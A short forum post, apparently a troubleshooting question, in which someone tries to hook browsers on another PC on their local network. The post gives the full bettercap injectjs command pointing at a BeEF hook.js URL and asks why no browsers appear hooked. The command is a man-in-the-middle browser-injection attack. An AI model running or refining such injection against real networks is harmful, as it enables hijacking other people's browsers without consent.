I am trying to inject beef's hook.js in browser on another pc on my local network.
After starting beef and login to the UI I started bettercap in terminal and executed the following command:
sudo bettercap --proxy-module injectjs --js-url "http://192.168.43.141:3000/hook.js"
After that I'm getting results from bettercap about browsing on the targeted pc but beef doesn't show anything in the user panel (no hooked browsers) ....any idea?
Update from comment:
So I've installed newer version of bettercap and it's all the same...I can sniff the traffic from the IP but I can't hook with beef....I'm open to other suggestions instead of beef and bettercap as well....